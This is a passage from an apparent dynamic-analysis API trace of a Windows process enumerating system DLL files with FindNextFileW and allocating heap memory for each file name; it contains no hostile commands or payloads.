lstrlenW (lpString="api-ms-win-core-xstate-l1-1-0.dll") returned 33 [0027.709] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44f180 [0027.709] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="")) returned 1 [0027.709] lstrlenW (lpString="api-ms-win-core-xstate-l2-1-0.dll") returned 33 [0027.709] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44f250 [0027.709] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.709] lstrlenW (lpString="api-ms-win-crt-conio-l1-1-0.dll") returned 31 [0027.709] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc0) returned 0x44f320 [0027.709] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb852a170, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb852a170, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.709] lstrlenW (lpString="api-ms-win-crt-convert-l1-1-0.dll") returned 33 [0027.709] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x44f3e8 [0027.709] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8504010, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8504010, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.709] lstrlenW (lpString="api-ms-win-crt-environment-l1-1-0.dll") returned 37 [0027.709] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xcc) returned 0x44f4b8 [0027.709] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb852a170, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb852a170, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.711] lstrlenW (lpString="api-ms-win-crt-filesystem-l1-1-0.dll") returned 36 [0027.711] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xca) returned 0x44f5a8 [0027.711] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.711] lstrlenW (lpString="api-ms-win-crt-heap-l1-1-0.dll") returned 30 [0027.711] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xbe) returned 0x451590 [0027.711] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.711] lstrlenW (lpString="api-ms-win-crt-locale-l1-1-0.dll") returned 32 [0027.711] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc2) returned 0x451670 [0027.711] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb846ba90, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb846ba90, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x5760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.711] lstrlenW (lpString="api-ms-win-crt-math-l1-1-0.dll") returned 30 [0027.711] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xbe) returned 0x453658 [0027.711] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8445930, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8445930, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.711] lstrlenW (lpString="api-ms-win-crt-multibyte-l1-1-0.dll") returned 35 [0027.712] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc8) returned 0x451740 [0027.712] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8125c50, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8125c50, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x10360, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.712] lstrlenW (lpString="api-ms-win-crt-private-l1-1-0.dll") returned 33 [0027.712] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x451810 [0027.712] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.712] lstrlenW (lpString="api-ms-win-crt-process-l1-1-0.dll") returned 33 [0027.712] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x4518e0 [0027.712] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84b7d50, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84b7d50, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.712] lstrlenW (lpString="api-ms-win-crt-runtime-l1-1-0.dll") returned 33 [0027.712] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x4519b0 [0027.712] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.712] lstrlenW (lpString="api-ms-win-crt-stdio-l1-1-0.dll") returned 31 [0027.712] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc0) returned 0x453720 [0027.712] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb85502d0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb85502d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.712] lstrlenW (lpString="api-ms-win-crt-string-l1-1-0.dll") returned 32 [0027.712] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc2) returned 0x451a80 [0027.712] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.712] lstrlenW (lpString="api-ms-win-crt-time-l1-1-0.dll") returned 30 [0027.713] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xbe) returned 0x4537e8 [0027.713] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.713] lstrlenW (lpString="api-ms-win-crt-utility-l1-1-0.dll") returned 33 [0027.714] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc4) returned 0x451b50 [0027.714] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8504010, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8504010, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-eventing-provider-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.714] lstrlenW (lpString="api-ms-win-eventing-provider-l1-1-0.dll") returned 39 [0027.714] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd0) returned 0x44f680 [0027.714] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1833b5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1833b5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d1a7690, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-base-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.714] lstrlenW (lpString="api-ms-win-security-base-l1-1-0.dll") returned 35 [0027.714] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc8) returned 0x451c20 [0027.714] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4f381b9f, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x4f381b9f, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x4f37fbd0, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-lsalookup-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.714] lstrlenW (lpString="api-ms-win-security-lsalookup-l1-1-0.dll") returned 40 [0027.714] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd2) returned 0x4538b0 [0027.714] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4f3a7cfe, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x4f3a7cfe, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x4f3a6cd0, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-sddl-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.714] lstrlenW (lpString="api-ms-win-security-sddl-l1-1-0.dll") returned 35 [0027.714] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc8) returned 0x451cf0 [0027.714] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-core-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.714] lstrlenW (lpString="api-ms-win-service-core-l1-1-0.dll") returned 34 [0027.714] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xc6) returned 0x451dc0 [0027.714] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1370f7, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1370f7, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-management-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.714] lstrlenW (lpString="api-ms-win-service-management-l1-1-0.dll") returned 40 [0027.715] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd2) returned 0x453990 [0027.715] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d09eb7b, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d09eb7b, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-management-l2-1-0.dll", cAlternateFileName="")) returned 1 [0027.715] lstrlenW (lpString="api-ms-win-service-management-l2-1-0.dll") returned 40 [0027.715] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xd2) returned 0x453a70 [0027.715] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d267bef, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d267bef, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-winsvc-l1-1-0.dll", cAlternateFileName="")) returned 1 [0027.715] lstrlenW (lpString="api-ms-win-service-winsvc-l1-1-0.dll") returned 36 [0027.715] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xca) returned 0x44f758 [0027.715] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7821a163, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x7821a163, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apilogen.dll", cAlternateFileName="")) returned 1 [0027.715] lstrlenW (lpString="apilogen.dll") returned 12 [0027.715] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x453b50 [0027.715] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f2f92c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc1f2f92c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x36000, dwReserved0=0x0, dwReserved1=0x0, cFileName="apircl.dll", cAlternateFileName="")) returned 1 [0027.715] lstrlenW (lpString="apircl.dll") returned 10 [0027.715] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x453bf8 [0027.715] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de74afe, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2de74afe, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf261dbf0, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apisetschema.dll", cAlternateFileName="")) returned 1 [0027.715] lstrlenW (lpString="apisetschema.dll") returned 16 [0027.715] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa2) returned 0x453c98 [0027.715] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92c3856c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92c3856c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92c5e6cc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x48400, dwReserved0=0x0, dwReserved1=0x0, cFileName="apphelp.dll", cAlternateFileName="")) returned 1 [0027.715] lstrlenW (lpString="apphelp.dll") returned 11 [0027.715] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x453d48 [0027.716] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4c40da, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x7a4c40da, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apphlpdm.dll", cAlternateFileName="")) returned 1 [0027.716] lstrlenW (lpString="Apphlpdm.dll") returned 12 [0027.716] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x453de8 [0027.716] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6b7842, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xcc6b7842, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7e608600, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="appidapi.dll", cAlternateFileName="")) returned 1 [0027.716] lstrlenW (lpString="appidapi.dll") returned 12 [0027.716] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x453e90 [0027.716] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd29cc968, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd29cc968, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7e6540f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x31a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppIdPolicyEngineApi.dll", cAlternateFileName="")) returned 1 [0027.716] lstrlenW (lpString="AppIdPolicyEngineApi.dll") returned 24 [0027.716] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xb2) returned 0x453f38 [0027.716] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98006f9, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x98006f9, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7e6c6ce0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24800, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgmts.dll", cAlternateFileName="")) returned 1 [0027.716] lstrlenW (lpString="appmgmts.dll") returned 12 [0027.716] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x453ff8 [0027.716] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c14fdd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1c14fdd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1c6129e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x53000, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgr.dll", cAlternateFileName="")) returned 1 [0027.716] lstrlenW (lpString="appmgr.dll") returned 10 [0027.716] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x4540a0 [0027.717] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f6f58ca, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8f6f58ca, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8f6f58ca, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="appwiz.cpl", cAlternateFileName="")) returned 1 [0027.717] lstrlenW (lpString="appwiz.cpl") returned 10 [0027.717] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc81f8794, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc81f8794, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e6eb6d0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x30e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apss.dll", cAlternateFileName="")) returned 1 [0027.717] lstrlenW (lpString="apss.dll") returned 8 [0027.717] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x92) returned 0x454158 [0027.717] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", 